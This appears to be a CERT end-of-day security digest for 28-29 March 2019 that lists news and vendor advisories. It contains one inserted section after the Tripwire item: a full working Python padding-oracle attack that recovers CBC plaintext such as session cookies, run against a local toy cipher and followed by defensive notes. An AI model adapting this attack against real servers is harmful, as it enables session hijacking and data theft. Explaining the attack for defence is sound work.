=====================
= End-of-Day report =
=====================

Timeframe:   Thursday 28-03-2019 18:00 − Friday 29-03-2019 18:00
Handler:     Dimitri Robl
Co-Handler:  Robert Waldner

=====================
=       News        =
=====================
*** Severe security vulnerability in the SSL/TLS library axTLS ***
---------------------------------------------
Web servers that implement their transport encryption with axTLS are susceptible to attack.
---------------------------------------------
http://heise.de/-4355704

*** World Backup Day: Is your data in safe hands? ***
---------------------------------------------
World Backup Day is a reminder that organizations and individuals need to make data backup and protection a priority.
---------------------------------------------
https://www.welivesecurity.com/2019/03/29/world-backup-day-data-safe-hands/

*** TLS CBC Padding Oracles in 2019 ***
---------------------------------------------
Since August, I've spent countless hours studying CBC padding oracle attacks toward the development of a new scan tool called padcheck. Using this tool, I was able to identify thousands of popular domains which could be targeted by an active network adversary (i.e. MiTM) to hijack authenticated HTTPS sessions. The underlying vulnerabilities break down into [...]
---------------------------------------------
https://www.tripwire.com/state-of-security/vert/tls-cbc-padding-oracles/
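The Tripwire item above reports that a network attacker can use a CBC padding oracle against HTTPS. The following is an added example (not code from the Tripwire article and not from the padcheck tool) showing the attacker's side of a Vaudenay-style padding oracle attack: given only an oracle that answers "did this ciphertext decrypt to valid PKCS#7 padding?", it recovers the full plaintext without ever touching the key. The block cipher is a toy 4-round Feistel network keyed with HMAC-SHA256; that is an assumption made so the example runs on the Python standard library alone, and the attack itself is cipher-agnostic and proceeds identically against AES-CBC. The session cookie used as plaintext is a constructed sample. The example also handles the classic last-byte ambiguity (a hit that is really a \x02\x02 padding rather than \x01).

```python
# Added example: attacker side of a CBC padding-oracle attack (Vaudenay 2002).
# Not from the Tripwire article or padcheck; toy Feistel cipher stands in for AES.
import hashlib
import hmac
import os

BLOCK = 16
SECRET = b"Cookie: session=9f86d081884c7d65"  # constructed sample plaintext

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Feistel round function: keyed HMAC of the half block, truncated to 8 bytes.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _round(key, i, l)), l
    return l + r

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if n == 0 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(prev, plaintext[i:i + BLOCK]))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += xor(prev, block_decrypt(key, cur))
        prev = cur
    return out

def padding_oracle(key: bytes, iv: bytes, ciphertext: bytes) -> bool:
    # The server-side leak: a single bit, "was the padding valid?".  In real TLS
    # this is a distinguishable alert or a timing difference, modelled here as a bool.
    try:
        unpad(cbc_decrypt(key, iv, ciphertext))
        return True
    except ValueError:
        return False

def attack_block(oracle, prev: bytes, block: bytes) -> bytes:
    # Recover D = Dec_k(block) one byte at a time from the end; then P = D xor prev.
    inter = bytearray(BLOCK)
    for k in range(BLOCK - 1, -1, -1):
        p = BLOCK - k                      # padding value we force onto bytes k..15
        forged = bytearray(BLOCK)
        for j in range(k + 1, BLOCK):
            forged[j] = inter[j] ^ p       # already-known bytes are made to decrypt to p
        for g in range(256):
            forged[k] = g
            if not oracle(bytes(forged), block):
                continue
            if k == BLOCK - 1:
                # Last byte: the hit may be \x02\x02 (etc.) instead of \x01.  Flip the
                # byte before it; only a genuine \x01 padding stays valid afterwards.
                forged[k - 1] ^= 0xFF
                still_ok = oracle(bytes(forged), block)
                forged[k - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[k] = g ^ p               # forged[k] xor D[k] == p, so D[k] = g xor p
            break
        else:
            raise RuntimeError("oracle never accepted any guess: not a padding oracle?")
    return xor(bytes(inter), prev)

def attack(oracle, iv: bytes, ciphertext: bytes) -> bytes:
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    padded = b"".join(attack_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return unpad(padded)

def recover_demo() -> bytes:
    # Victim encrypts; the attacker gets iv + ciphertext and oracle access, never the key.
    key, iv = os.urandom(32), os.urandom(BLOCK)
    ciphertext = cbc_encrypt(key, iv, pad(SECRET))
    return attack(lambda test_iv, blk: padding_oracle(key, test_iv, blk), iv, ciphertext)
```

`recover_demo()` returns the original cookie after at most 256 oracle queries per plaintext byte. The point for a defender is the shape of the oracle function: the moment padding validity is observable to the network (distinct alerts, different error paths, measurable timing), the cipher's strength is irrelevant, which is why the fix is constant-time MAC-then-check handling or, better, AEAD cipher suites rather than CBC at all.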
*** Researchers discover and abuse new undocumented feature in Intel chipsets ***
---------------------------------------------
Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.
---------------------------------------------
https://www.zdnet.com/article/researchers-discover-and-abuse-new-undocumente...

*** Researchers publish list of MAC addresses targeted in ASUS hack ***
---------------------------------------------
Most of the targeted MAC addresses are used by ASUStek, Intel, and AzureWave devices.
---------------------------------------------
https://www.zdnet.com/article/researchers-publish-list-of-mac-addresses-targ...
=====================
=  Vulnerabilities  =
=====================

*** Rockwell Automation PowerFlex 525 AC Drives ***
---------------------------------------------
This advisory includes mitigations for a resource exhaustion vulnerability reported in Rockwell Automation's PowerFlex 525 AC drive.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01

*** Magento 2.3.1, 2.2.8 and 2.1.17 Security Update ***
---------------------------------------------
Magento Commerce and Open Source 2.3.1, 2.2.8 and 2.1.17 contain multiple security enhancements that help close Remote Code Execution (RCE), Cross-Site Scripting (XSS) and other vulnerabilities.
---------------------------------------------
https://magento.com/security/patches/magento-2.3.1-2.2.8-and-2.1.17-security...

*** VMSA-2019-0004 ***
---------------------------------------------
VMware vCloud Director for Service Providers update resolves a Remote Session Hijack vulnerability.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2019-0004.html

*** VMSA-2019-0005 ***
---------------------------------------------
VMware ESXi, Workstation and Fusion updates address multiple security issues.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2019-0005.html

*** Security updates for Friday ***
---------------------------------------------
Security updates have been issued by Arch Linux (dovecot and imagemagick), Debian (dovecot, libraw, pdns, and ruby2.1), Fedora (mingw-podofo, openwsman, podofo, qemu, and svgsalamander), openSUSE (chromium, ffmpeg-4, firefox, libssh2_org, nodejs4, and qemu), Red Hat (libssh2), Scientific Linux (libssh2 and thunderbird), SUSE (kernel, liblouis, ntp, openssl-1_1, and tiff), and Ubuntu (firefox, freeimage, libapache2-mod-auth-mellon, and thunderbird).
---------------------------------------------
https://lwn.net/Articles/784370/

*** Vuln: Apache HBase CVE-2019-0212 Authorization Bypass Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/107624

*** Vuln: Apache ActiveMQ CVE-2019-0222 Denial of Service Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/107622

*** GnuTLS: Multiple vulnerabilities allow denial of service ***
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K19-0253

*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational DOORS Web Access ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabiliti...

*** IBM Security Bulletin: IBM Event Streams is affected by cURL vulnerabilities ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...

*** IBM Security Bulletin: IBM Event Streams is affected by vulnerabilities in the shipped Node runtime ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...

*** IBM Security Bulletin: IBM Event Streams is affected by jackson-databind vulnerabilities ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...

*** IBM Security Bulletin: Rational Build Forge Security Advisory for Apache HTTP Server (CVE-2019-0190; CVE-2018-17189; CVE-2018-17199) ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-rational-build-forge-s...

*** IBM Security Bulletin: IBM Event Streams is affected by Alpine vulnerability CVE-2018-1000849 ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...

*** IBM Security Bulletin: IBM Event Streams is affected by Node.js vulnerabilities ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...

*** IBM Security Bulletin: Security vulnerabilities identified in OpenSSL affect Rational Build Forge (CVE-2018-0734, CVE-2018-5407 and CVE-2019-1559) ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-security-vulnerabiliti...

*** IBM Security Bulletin: IBM Event Streams is affected by OpenSSL vulnerabilities ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...

*** IBM Security Bulletin: IBM Event Streams is affected by gettext vulnerability CVE-2018-18751 ***
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-event-streams-is-a...